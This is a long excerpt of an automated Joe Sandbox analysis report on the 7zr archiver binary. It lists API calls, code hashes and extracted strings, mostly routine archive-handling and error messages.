                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: e6aedda1f23491f8b40c2ecae890fac33056f84ebfb9897a16ad49555ead18c8
                                        • Instruction ID: 537b4aac38ba88b5f7b3e23746fd99ac47c647457c0e09aee16f7b9e42547cb2
                                        • Opcode Fuzzy Hash: e6aedda1f23491f8b40c2ecae890fac33056f84ebfb9897a16ad49555ead18c8
                                        • Instruction Fuzzy Hash: AAD0123151521147DB705E2DFC047D167DD7F11325B15445AF880DB240E764DCD25A50
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: malloc
                                        • String ID:
                                        • API String ID: 2803490479-0
                                        • Opcode ID: f6689b844a0abd90852679766297054ea5ad023363036feb97c819a96c7c6895
                                        • Instruction ID: 41355c163182d0a9a8239571ff9b53fb2755c99ea78676e84b1ec08ab750ae6b
                                        • Opcode Fuzzy Hash: f6689b844a0abd90852679766297054ea5ad023363036feb97c819a96c7c6895
                                        • Instruction Fuzzy Hash: 4CD0C771612A1509DF884630984965A21961F51317F1845BCB813CA2D1E715C6299758
                                        APIs
                                        • CloseHandle.KERNELBASE(00000000,?,005A75AF,00000002,?,00000000,00000000), ref: 005A7657
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: 5bde992c00452e70eb9ae12afac54c0aefc65746b2e1ac791532a3d4b311049d
                                        • Instruction ID: ef60a96506ad67847d94e29c827588bcc1095bf16a8feca4c7259e7f656e2287
                                        • Opcode Fuzzy Hash: 5bde992c00452e70eb9ae12afac54c0aefc65746b2e1ac791532a3d4b311049d
                                        • Instruction Fuzzy Hash: 6DD0123110962246CA681E3C7C45AC637D96A173343651759F0B0C32E1D3608C834654
                                        APIs
                                        • VirtualAlloc.KERNELBASE(00000000), ref: 00626B31
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: d42e3d43070c35cd81719e43bda28741b3b7857a0f84c0e212c77c3271ff818b
                                        • Instruction ID: e59ec987908d1ee617a7cdb2f4c2ed267d91c675c6fad61f4267c51f6b961cd9
                                        • Opcode Fuzzy Hash: d42e3d43070c35cd81719e43bda28741b3b7857a0f84c0e212c77c3271ff818b
                                        • Instruction Fuzzy Hash: 72C02BE1A4E290DFDF0253108C407603F318F83700F0A10C1E4045B0D3C2051C0CC723
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: malloc
                                        • String ID:
                                        • API String ID: 2803490479-0
                                        • Opcode ID: a1e9458a9ade6dcfe768eb88d97769c87549e2230f9edfc2c16aad58367e7da2
                                        • Instruction ID: cc456f8ff6f94ea6d4b47b113a9fd96e0d0f10c81ddd46426a1bd32a3331fcbd
                                        • Opcode Fuzzy Hash: a1e9458a9ade6dcfe768eb88d97769c87549e2230f9edfc2c16aad58367e7da2
                                        • Instruction Fuzzy Hash: A3A024D5D1115101DDDC33303C0545710431750307FC004FC7401C0311FF17C104504D
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: malloc
                                        • String ID:
                                        • API String ID: 2803490479-0
                                        • Opcode ID: 3fa4672c4b6bd134d2e796e347ec7e9f7655e2c8d42b0b7908dcec06aed2b463
                                        • Instruction ID: ee2bfcc0925ec892e6e9731a3e4e3becfd881e7e8b0e0a54a349f84ec82ce4e5
                                        • Opcode Fuzzy Hash: 3fa4672c4b6bd134d2e796e347ec7e9f7655e2c8d42b0b7908dcec06aed2b463
                                        • Instruction Fuzzy Hash: A0A012CCE0010001DD8411343805453105326E0605FD4C478780040215FA15C0042146
                                        APIs
                                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00626BAC
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: FreeVirtual
                                        • String ID:
                                        • API String ID: 1263568516-0
                                        • Opcode ID: 494ea9aa65209cdaa1bb9180c7e1fc71372914c2c4ec0b35134dbaa7981c94ba
                                        • Instruction ID: 03164c2c35c652c23315be7a63d492d8eb5e253bd28a1a20a3aa5d1616d4101b
                                        • Opcode Fuzzy Hash: 494ea9aa65209cdaa1bb9180c7e1fc71372914c2c4ec0b35134dbaa7981c94ba
                                        • Instruction Fuzzy Hash: 09A0027C681700B7EEA0AB306D4FF5937257781F15F3095447241691D05AE570449A5C
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: e2454b01198a5d00fc32ca08fa7a2be7c10d94ad4e9c325630ada15b60d1c1ce
                                        • Instruction ID: 8e70af0b81f727eb29e6e485e6268694df4619cb26c5e073408971f54a3dbf9d
                                        • Opcode Fuzzy Hash: e2454b01198a5d00fc32ca08fa7a2be7c10d94ad4e9c325630ada15b60d1c1ce
                                        • Instruction Fuzzy Hash:
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: ab05dfddccdf54668762160c2768d01c6ed1f72808f71746a1287bea05698b8a
                                        • Instruction ID: 3b09fbcf29a549fa13999d226738dc5f54572a7a0348736788d1109fadccc7a6
                                        • Opcode Fuzzy Hash: ab05dfddccdf54668762160c2768d01c6ed1f72808f71746a1287bea05698b8a
                                        • Instruction Fuzzy Hash:
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: a0f929106ff90b446873e7d905551dc896533e45bd30a64399273725b730a101
                                        • Instruction ID: c8438930c1c49757cef8ab3641619ba08827a4e67cbeaa8124d91d45d123b7f0
                                        • Opcode Fuzzy Hash: a0f929106ff90b446873e7d905551dc896533e45bd30a64399273725b730a101
                                        • Instruction Fuzzy Hash: 77A00275506101DFDB451B10ED094897B63EB86637B215459F057515718B314860BA01
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: Version
                                        • String ID:
                                        • API String ID: 1889659487-0
                                        • Opcode ID: 9d2d9f467db1bf2084ffdfe2613390edb9ae44591ffcab350cf0270388d7aaf8
                                        • Instruction ID: bab6f8577ce08ddcff05d262d5555a41538c3e500c75da105e7a9538ffd90336
                                        • Opcode Fuzzy Hash: 9d2d9f467db1bf2084ffdfe2613390edb9ae44591ffcab350cf0270388d7aaf8
                                        • Instruction Fuzzy Hash: 8ED02B7281541147F744772CC8063993763F7A1300FC80998DA60C1113F97EC645C2D6
                                        APIs
                                        • memcmp.MSVCRT(?,006548A0,00000010), ref: 005AC09E
                                        • memcmp.MSVCRT(?,00650258,00000010), ref: 005AC0BB
                                        • memcmp.MSVCRT(?,00650348,00000010), ref: 005AC0CE
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: memcmp
                                        • String ID:
                                        • API String ID: 1475443563-0
                                        • Opcode ID: 00635af68d28b4e66e08366007dc532765fe6fd0eca59f470e39be15a285bf14
                                        • Instruction ID: ba2f54938ac96f7c87d08347dd559339e2d9df50b661157b7fe9a501888d0e0b
                                        • Opcode Fuzzy Hash: 00635af68d28b4e66e08366007dc532765fe6fd0eca59f470e39be15a285bf14
                                        • Instruction Fuzzy Hash: 64915F71680611ABEB609B21DC45FAF7FA9BF66751F008429FD4ADB241F720EE08C790
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: $16-bit overflow for number of files in headers$32-bit overflow in headers$Central$Local$Minor_Extra_ERROR$Missing volume : $Unsorted_CD$Zip64$apk
                                        • API String ID: 3519838083-1909666238
                                        • Opcode ID: bc6113e16d1961037165074685bd523e92d11a36ab94372ac710cb31eec6bcca
                                        • Instruction ID: a963f993a8776a02078cb4b8aa1c46cde30c4bcc8688d33160dc32fe8d6ea261
                                        • Opcode Fuzzy Hash: bc6113e16d1961037165074685bd523e92d11a36ab94372ac710cb31eec6bcca
                                        • Instruction Fuzzy Hash: 2FC1C2B19802869FCB3DDF64C855AFF7B62EF42300F1984A9E2455B2A2DF319E45DB40
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005A64F8
                                        • GetCurrentThreadId.KERNEL32 ref: 005A6508
                                        • GetTickCount.KERNEL32 ref: 005A6513
                                        • GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 005A651E
                                        • GetTickCount.KERNEL32 ref: 005A6578
                                        • SetLastError.KERNEL32(000000B7,?,?,?,?,00000000), ref: 005A65C5
                                        • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 005A65EC
                                          • Part of subcall function 005A5D7A: __EH_prolog.LIBCMT ref: 005A5D7F
                                          • Part of subcall function 005A5D7A: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000001,?,?,00000000), ref: 005A5DA1
                                          • Part of subcall function 005A1E40: free.MSVCRT ref: 005A1E44
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: CountCurrentErrorH_prologLastTick$CreateDirectoryProcessThreadfree
                                        • String ID: .tmp$d
                                        • API String ID: 1989517917-2797371523
                                        • Opcode ID: 1a1b8e2718dd71cc34c43dd7977d6509039a5cf605e56f786e08696f07ece97d
                                        • Instruction ID: 34fe9d884d55b85e15cb90c02d1cc65cf0020adb5a5c0b2fb1f0a9b13c8c1748
                                        • Opcode Fuzzy Hash: 1a1b8e2718dd71cc34c43dd7977d6509039a5cf605e56f786e08696f07ece97d
                                        • Instruction Fuzzy Hash: DB41E032D111169BDF15AFA4D85A7EDBFB2FF5B324F180529E402A72A2CB398900CB51
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: fputs
                                        • String ID: : Cannot open the file as [$ERROR$Open $WARNING$] archive
                                        • API String ID: 1795875747-657955069
                                        • Opcode ID: 81322714a6920851308604ebdce02014e501affdfc5a28734dae2d36432a3643
                                        • Instruction ID: 258f7e70e2e6a35a5344a8b3403d39dafdf4dad0ff76a660c954b0362b13be95
                                        • Opcode Fuzzy Hash: 81322714a6920851308604ebdce02014e501affdfc5a28734dae2d36432a3643
                                        • Instruction Fuzzy Hash: 4EF082316041197FC7202B956C85D2EFF5BEF86361B250027F90443251EE6218649EB5
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005EE774
                                          • Part of subcall function 005A3563: memmove.MSVCRT(?,?,00000022,00000000,?,005A1DAE,00000000,00000000,00000000,005A1D37,7FFFFFE0,00000000,00000000,?,00000000,00000000), ref: 005A3588
                                          • Part of subcall function 005EE6C2: __EH_prolog.LIBCMT ref: 005EE6C7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog$memmove
                                        • String ID: H e$P e$T e$\ e$hcf$mtf$rsfx
                                        • API String ID: 593149739-2667359998
                                        • Opcode ID: 8e8d9b50b547d4c603041f5c068939c571fc85ad16cde453fd274272e23b1e12
                                        • Instruction ID: e8a809c82b696758f8fa4047f9e23ff1bd2c03089435b64e0a8121efc7ccfd18
                                        • Opcode Fuzzy Hash: 8e8d9b50b547d4c603041f5c068939c571fc85ad16cde453fd274272e23b1e12
                                        • Instruction Fuzzy Hash: 5451E4309141868BCF28EF96C4976BEBFB2BF82314F14882AECD657282D7759D05C750
                                        APIs
                                          • Part of subcall function 00637D80: WaitForSingleObject.KERNEL32(?,000000FF,005BAFD6,?), ref: 00637D83
                                          • Part of subcall function 00637D80: GetLastError.KERNEL32(?,000000FF,005BAFD6,?), ref: 00637D8E
                                          • Part of subcall function 00632FB0: EnterCriticalSection.KERNEL32(?,?,?,00632749), ref: 00632FB8
                                          • Part of subcall function 00632FB0: LeaveCriticalSection.KERNEL32(?,?,?,00632749), ref: 00632FC2
                                        • EnterCriticalSection.KERNEL32(?), ref: 0063290E
                                        • LeaveCriticalSection.KERNEL32(?), ref: 00632928
                                        • EnterCriticalSection.KERNEL32(?), ref: 00632992
                                        • LeaveCriticalSection.KERNEL32(?), ref: 006329B8
                                        • EnterCriticalSection.KERNEL32(?), ref: 00632A1E
                                        • LeaveCriticalSection.KERNEL32(?), ref: 00632A56
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterLeave$ErrorLastObjectSingleWait
                                        • String ID: v
                                        • API String ID: 2116739831-3261393531
                                        • Opcode ID: 05810b6e7ac61ce242fb17090796addd01130dd8f0e00eb6f24154e2a8945d4e
                                        • Instruction ID: fdf88adede0e1712ee9b8022b96230edcab9a9fbdc78f1f674db5459557d9c8a
                                        • Opcode Fuzzy Hash: 05810b6e7ac61ce242fb17090796addd01130dd8f0e00eb6f24154e2a8945d4e
                                        • Instruction Fuzzy Hash: C9C15A756047068FC760DF29C5A0BA7B7E2FF98314F10492DE9AA87351EB30E949CB91
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prologfputs
                                        • String ID: Cannot open the file$The archive is open with offset$The file is open$WARNING:
                                        • API String ID: 1798449854-1259944392
                                        • Opcode ID: 541d67d11cd6e9b3164c7a84f3a9727a9d9d49335ade91aa5b4c8d37496bc678
                                        • Instruction ID: 94457f68223c655faea5c7b1cea242237fe4bccc58dee0f71df3211b8fdd93df
                                        • Opcode Fuzzy Hash: 541d67d11cd6e9b3164c7a84f3a9727a9d9d49335ade91aa5b4c8d37496bc678
                                        • Instruction Fuzzy Hash: D1217F35A005069FCB14EF98D946AAEBBA5FF95310F01042BE502977A2CB70AD028B94
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005AA091
                                          • Part of subcall function 005A9BAA: RegCloseKey.ADVAPI32(?,?,005A9BA0), ref: 005A9BB6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: CloseH_prolog
                                        • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$Previous Update Revision$Update Revision$x86
                                        • API String ID: 1579395594-270022386
                                        • Opcode ID: 0ad406e95b7671ef0e23e94cd4f505dfb9692a1dd5218ae28094aecfecbb14b8
                                        • Instruction ID: 35b3b5811a4887c45c5fe1e7121effb7ad4b94c767e0a06320c558b9ccfee8b1
                                        • Opcode Fuzzy Hash: 0ad406e95b7671ef0e23e94cd4f505dfb9692a1dd5218ae28094aecfecbb14b8
                                        • Instruction Fuzzy Hash: C051A271E0120AEFCF11EF98C8969AEBBB5FF5A300F41842DE512A7241DB709905CB91
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005FC453
                                          • Part of subcall function 005FC1DF: __EH_prolog.LIBCMT ref: 005FC1E4
                                          • Part of subcall function 005FC543: __EH_prolog.LIBCMT ref: 005FC548
                                          • Part of subcall function 005A1E0C: malloc.MSVCRT ref: 005A1E1F
                                          • Part of subcall function 005A1E0C: _CxxThrowException.MSVCRT(?,00654B28), ref: 005A1E39
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog$ExceptionThrowmalloc
                                        • String ID: ((e$<(e$L(e$\(e
                                        • API String ID: 3744649731-1619957961
                                        • Opcode ID: 468d7581a0f9c517f74004c500307ebbe9a8f159823ad7963b83fa48a93194a6
                                        • Instruction ID: 6879f8eec6c373118781789c1c02c2972e6909d62f5451f953aa5a68b82e285f
                                        • Instruction Fuzzy Hash: 822189B0900B498EC724DFAAC55866BFFF5FF91304F10895ED49697611DBB0AA08CB50
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005D46D4
                                        • EnterCriticalSection.KERNEL32(00662918), ref: 005D46E8
                                        • CompareFileTime.KERNEL32(?,?), ref: 005D4712
                                        • LeaveCriticalSection.KERNEL32(00662918), ref: 005D476A
                                        Strings
                                        Similarity
                                        • API ID: CriticalSection$CompareEnterFileH_prologLeaveTime
                                        • String ID: v
                                        • API String ID: 3800395459-3261393531
                                        • Opcode ID: 0ee92deb8de18cb66a49dcc1dc3875ebe5dfa2afdceab48c32e51cb65f22f472
                                        • Instruction ID: 46ae5d7918d687bf39959acb4b991a15b0d9ef0e1a173b35345fe35997a321d5
                                        • Instruction Fuzzy Hash: F0219A71500601AFDB308F28C488B9ABFB5FF82344F14851BE45A87611D730AA49CF90
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005D4642
                                        • EnterCriticalSection.KERNEL32(00662918), ref: 005D4656
                                        • LeaveCriticalSection.KERNEL32(00662918), ref: 005D4685
                                        • LeaveCriticalSection.KERNEL32(00662918), ref: 005D46C5
                                        Strings
                                        Similarity
                                        • API ID: CriticalSection$Leave$EnterH_prolog
                                        • String ID: v
                                        • API String ID: 2532973370-3261393531
                                        • Opcode ID: 2c9a3455026cf6a229b702519283948eaab36e3aadc5321f1aa4a895d5fba888
                                        • Instruction ID: d7f5d76e0c335de240de5401e52124533f374aadd16ee7e99b0726abe07a776e
                                        • Instruction Fuzzy Hash: 8B115E75A00601EFC724DF19C88496EBBA9FF9A720B10862EE40ADB700C775ED05CF90
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005D602A
